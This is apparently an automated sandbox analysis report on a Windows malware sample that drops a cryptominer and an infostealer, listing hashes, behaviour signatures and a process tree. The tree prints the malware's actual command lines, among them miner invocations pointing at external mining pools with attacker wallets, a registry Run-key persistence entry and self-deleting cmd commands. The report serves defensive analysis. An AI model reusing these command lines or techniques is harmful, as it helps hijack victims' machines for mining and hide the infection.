Analysis
max time kernel: 75s
max time network: 136s
platform: windows10_x64
resource: win10v20201028
submitted: 04-04-2021 11:52

Static task: static1
Behavioral task: behavioral1
Sample: file.exe
Resource: win7v20201028
General
Target: file.exe
Size: 126KB
MD5: fdefd1e361d1020577bf018a5a98040c
SHA1: 2d7c4cfa15f4cb29ce95e7a59c3089a081a772a2
SHA256: 01cb6ab274dc0ac90192b537a606965d98f03d99c95b3a0e24bc6cad724d42c7
SHA512: adb42dc5cc31b95f6e3d463068d57480acb50c80ce49f4fabd0fa87700dda3d92afe543f2569f2e92077afd0d00869c5cdf24902968050132eccd9a230719378
Malware Config
Signatures

XMRig Miner Payload (4 IoCs)
Processes:
resource | yara_rule
behavioral2/memory/3472-14-0x00000001402CA898-mapping.dmp | xmrig
behavioral2/memory/3472-13-0x0000000140000000-0x000000014070A000-memory.dmp | xmrig
behavioral2/memory/3472-16-0x0000000140000000-0x000000014070A000-memory.dmp | xmrig
behavioral2/memory/3472-17-0x0000000140000000-0x000000014070A000-memory.dmp | xmrig

Blocklisted process makes network request (1 IoC)
Processes:
flow | pid | process
35 | 3472 | msiexec.exe
Executes dropped EXE (2 IoCs)
Processes:
pid | process
3404 | AE08.tmp.exe
96 | AF03.tmp.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 2 IoCs)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | AE08.tmp.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" | AE08.tmp.exe
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Suspicious use of SetThreadContext (2 IoCs)
Processes:
description | pid | process | target process
PID 3404 set thread context of 2956 | 3404 | AE08.tmp.exe | msiexec.exe
PID 3404 set thread context of 3472 | 3404 | AE08.tmp.exe | msiexec.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Delays execution with timeout.exe (1 IoC)
Processes:
pid | process
3284 | timeout.exe

Modifies data under HKEY_USERS (1 IoC)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\PegasPc | file.exe

Modifies system certificate store
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | file.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data omitted) | file.exe
Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes:
pid | process
644 | file.exe (8 identical entries)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
description | pid | process
Token: SeLockMemoryPrivilege | 3472 | msiexec.exe
Token: SeLockMemoryPrivilege | 3472 | msiexec.exe
Token: SeDebugPrivilege | 644 | file.exe

Suspicious use of WriteProcessMemory (44 IoCs)
Processes (identical rows collapsed, with the number of entries in the last column):
description | pid | process | target process | entries
PID 644 wrote to memory of 3404 | 644 | file.exe | AE08.tmp.exe | 2
PID 644 wrote to memory of 96 | 644 | file.exe | AF03.tmp.exe | 3
PID 3404 wrote to memory of 2956 | 3404 | AE08.tmp.exe | msiexec.exe | 12
PID 3404 wrote to memory of 3472 | 3404 | AE08.tmp.exe | msiexec.exe | 15
PID 644 wrote to memory of 2192 | 644 | file.exe | cmd.exe | 3
PID 2192 wrote to memory of 2320 | 2192 | cmd.exe | PING.EXE | 3
PID 96 wrote to memory of 4084 | 96 | AF03.tmp.exe | cmd.exe | 3
PID 4084 wrote to memory of 3284 | 4084 | cmd.exe | timeout.exe | 3
Processes (indented by depth in the process tree)

(depth 1) C:\Users\Admin\AppData\Local\Temp\file.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Modifies data under HKEY_USERS
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  (depth 2) C:\Users\Admin\AppData\Roaming\AE08.tmp.exe
    cmdline: "C:\Users\Admin\AppData\Roaming\AE08.tmp.exe"
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

    (depth 3) C:\Windows\system32\msiexec.exe
      cmdline: -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999

    (depth 3) C:\Windows\system32\msiexec.exe
      cmdline: -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
      - Blocklisted process makes network request
      - Suspicious use of AdjustPrivilegeToken

  (depth 2) C:\Users\Admin\AppData\Roaming\AF03.tmp.exe
    cmdline: "C:\Users\Admin\AppData\Roaming\AF03.tmp.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    (depth 3) C:\Windows\SysWOW64\cmd.exe
      cmdline: /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\AF03.tmp.exe
      - Suspicious use of WriteProcessMemory

      (depth 4) C:\Windows\SysWOW64\timeout.exe
        cmdline: timeout /t 3
        - Delays execution with timeout.exe

  (depth 2) C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\file.exe"
    - Suspicious use of WriteProcessMemory

    (depth 3) C:\Windows\SysWOW64\PING.EXE
      cmdline: ping 127.0.0.1
      - Runs ping.exe
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
-
C:\Users\Admin\AppData\Roaming\AE08.tmp.exe
MD5: 01e6cae5a0f506d2b3b01162bcc7b078
SHA1: 6e6d05630da0163a38a70865280fcad42ab1c74d
SHA256: 25e36c95be9a4255ae41717a89b4f3749bc438640fc48be7b7560cd1afb855d1
SHA512: ee4fa60e70f6532896633a6c2f683405fa2f4246b9e4336a9a0171124e21761153c859f2ca69207e0e1a4f8979d192727c0b6c05879f4676646c1c12010a77ea
-
C:\Users\Admin\AppData\Roaming\AF03.tmp.exe
MD5: 98d0976214fb5720a6b2c23ba035b741
SHA1: 1eb4da1f7de4ca6718d75c6ac713b6324948ad6c
SHA256: 553e5fd6df66c3d38733e1942ffbf2557843fc19c48fa1a2379eee9eb528c144
SHA512: 4a1bf187b5483d70925cb1ae91090f2abde87ecd115d298f01e0c9c0b9bf428c53b3db6c6173aaf4b96cc345b093cd95cf2641894dc7b1edfdc2689ef6582925
-
Memory dumps (path, Filesize where reported):
- memory/96-22-0x0000000000400000-0x000000000587C000-memory.dmp  Filesize: 84.5MB
- memory/96-6-0x0000000000000000-mapping.dmp
- memory/96-21-0x00000000077E0000-0x000000000CC5C000-memory.dmp  Filesize: 84.5MB
- memory/644-9-0x0000000003600000-0x0000000003648000-memory.dmp  Filesize: 288KB
- memory/644-2-0x00000000009C0000-0x00000000009CD000-memory.dmp  Filesize: 52KB
- memory/2192-19-0x0000000000000000-mapping.dmp
- memory/2320-20-0x0000000000000000-mapping.dmp
- memory/2956-12-0x0000000140000000-0x0000000140383000-memory.dmp  Filesize: 3.5MB
- memory/2956-11-0x00000001401FBC30-mapping.dmp
- memory/2956-10-0x0000000140000000-0x0000000140383000-memory.dmp  Filesize: 3.5MB
- memory/3284-24-0x0000000000000000-mapping.dmp
- memory/3404-3-0x0000000000000000-mapping.dmp
- memory/3472-18-0x000002695B400000-0x000002695B420000-memory.dmp  Filesize: 128KB
- memory/3472-17-0x0000000140000000-0x000000014070A000-memory.dmp  Filesize: 7.0MB
- memory/3472-16-0x0000000140000000-0x000000014070A000-memory.dmp  Filesize: 7.0MB
- memory/3472-15-0x000002695B3C0000-0x000002695B3D4000-memory.dmp  Filesize: 80KB
- memory/3472-14-0x00000001402CA898-mapping.dmp
- memory/3472-13-0x0000000140000000-0x000000014070A000-memory.dmp  Filesize: 7.0MB
- memory/3472-25-0x000002695B520000-0x000002695B540000-memory.dmp  Filesize: 128KB
- memory/4084-23-0x0000000000000000-mapping.dmp